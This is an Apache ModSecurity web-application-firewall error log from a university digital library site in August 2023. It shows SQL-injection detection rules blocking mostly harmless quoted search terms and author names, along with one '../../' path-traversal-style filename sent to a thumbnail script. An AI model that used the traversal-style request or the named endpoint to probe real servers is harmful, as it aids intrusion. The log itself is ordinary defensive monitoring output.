[Mon Aug 28 14:55:26.239490 2023] [:error] [pid 45514] [client 47.128.23.220] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22Fire condition\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOxS7sCo-f0AALHKAAIAAAAE"]
[Mon Aug 28 15:11:27.135114 2023] [:error] [pid 45829] [client 47.128.24.1] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22Decision making\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOxWr8Co-f0AALMFb8cAAAAH"]
[Mon Aug 28 15:17:05.420648 2023] [:error] [pid 45902] [client 47.128.31.157] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22Triangulation\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOxYAcCo-f0AALNOJ-0AAAAS"]
[Mon Aug 28 15:18:37.360004 2023] [:error] [pid 45959] [client 47.128.26.145] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22PLS-MGA\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOxYXcCo-f0AALOHoRIAAAAH"]
[Mon Aug 28 15:21:42.612288 2023] [:error] [pid 45968] [client 47.128.24.250] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:filename: ../../images/docs/JTI.EMER.2016.007.gif.gif"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/lib/minigalnano/createthumb.php"] [unique_id "ZOxZFsCo-f0AALOQJZEAAAAK"]
[Mon Aug 28 15:23:54.918910 2023] [:error] [pid 46199] [client 47.128.31.33] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22Business ecosystem\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOxZmsCo-f0AALR3GfgAAAAR"]
[Mon Aug 28 15:30:44.438453 2023] [:error] [pid 46286] [client 85.208.96.206] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Budi Kurniawan\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOxbNMCo-f0AALTOpOAAAAAO"]
[Mon Aug 28 15:34:38.689263 2023] [:error] [pid 46297] [client 85.208.96.197] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22Pemrograman Database\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOxcHsCo-f0AALTZZF8AAAAR"]
[Mon Aug 28 15:40:38.604110 2023] [:error] [pid 46527] [client 47.128.22.248] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Ming K. Lim\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOxdhsCo-f0AALW-EDkAAAAW"]
[Mon Aug 28 15:41:24.882671 2023] [:error] [pid 46533] [client 47.128.17.194] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS_NAMES:+Utilitas". [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS_NAMES:+Utilitas\\x22:  Utilitas\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOxdtMCo-f0AALXFogwAAAAE"]
[Mon Aug 28 15:49:59.770110 2023] [:error] [pid 46535] [client 85.208.96.195] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22WIBISONO, Gunawan\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOxft8Co-f0AALXHDJkAAAAA"]
[Mon Aug 28 15:51:01.147036 2023] [:error] [pid 46659] [client 47.128.18.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Hanna,Thomas\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOxf9cCo-f0AALZDco0AAAAD"]
[Mon Aug 28 15:53:19.615525 2023] [:error] [pid 46696] [client 47.128.27.29] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Andrew W.T. La\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOxgf8Co-f0AALZo4BUAAAAI"]
[Mon Aug 28 15:56:13.575629 2023] [:error] [pid 46754] [client 47.128.31.123] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22SEM/EDX analysis\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOxhLcCo-f0AALaia90AAAAE"]
[Mon Aug 28 15:56:23.807670 2023] [:error] [pid 46749] [client 85.208.96.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22Sistem Operasi  Microsoft\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOxhN8Co-f0AALadN9QAAAAJ"]
[Mon Aug 28 16:04:09.269723 2023] [:error] [pid 46922] [client 47.128.22.21] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Reza Jafarzadeh\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOxjCcCo-f0AALdKM28AAAAN"]
[Mon Aug 28 16:04:52.070614 2023] [:error] [pid 46926] [client 85.208.96.205] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22Failure data\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOxjNMCo-f0AALdOhJEAAAAS"]
[Mon Aug 28 16:08:59.993128 2023] [:error] [pid 46855] [client 47.128.31.117] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22Sargodha\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOxkK8Co-f0AALcHEqMAAAAJ"]
[Mon Aug 28 16:11:52.227545 2023] [:error] [pid 47066] [client 85.208.96.211] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22Pemrograman J2ME\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOxk2MCo-f0AALfaRkMAAAAL"]
[Mon Aug 28 16:17:57.735704 2023] [:error] [pid 47130] [client 47.128.24.65] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Byung-Moon Seol\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOxmRcCo-f0AALgaXpsAAAAY"]
[Mon Aug 28 16:34:00.960396 2023] [:error] [pid 47309] [client 47.128.19.107] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22Lean Six Sigma (LSS)\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOxqCMCo-f0AALjNngoAAAAI"]
[Mon Aug 28 16:38:31.527334 2023] [:error] [pid 47474] [client 47.128.16.81] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Maurizio Faccio\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOxrF8Co-f0AALlyRqQAAAAM"]
[Mon Aug 28 16:41:36.048196 2023] [:error] [pid 47584] [client 216.131.118.49] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22Value\\x22'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOxrz8Co-f0AALngn@8AAAAK"]
[Mon Aug 28 16:41:36.859166 2023] [:error] [pid 47595] [client 216.131.118.49] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22Value\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOxr0MCo-f0AALnr7RUAAAAJ"]
[Mon Aug 28 16:42:00.532446 2023] [:error] [pid 47589] [client 85.208.96.194] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22Inter-organizational collaboration\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOxr6MCo-f0AALnlIPwAAAAL"]
[Mon Aug 28 16:42:05.241433 2023] [:error] [pid 47458] [client 85.208.96.211] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22ELEMEN\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOxr7cCo-f0AALliA@wAAAAD"]
[Mon Aug 28 16:44:51.220496 2023] [:error] [pid 47608] [client 47.128.28.101] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22ZAKI\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOxsk8Co-f0AALn4AAMAAAAR"]
[Mon Aug 28 16:44:51.374305 2023] [:error] [pid 47608] [client 47.128.28.101] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22ZAKI\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOxsk8Co-f0AALn4AAQAAAAR"]
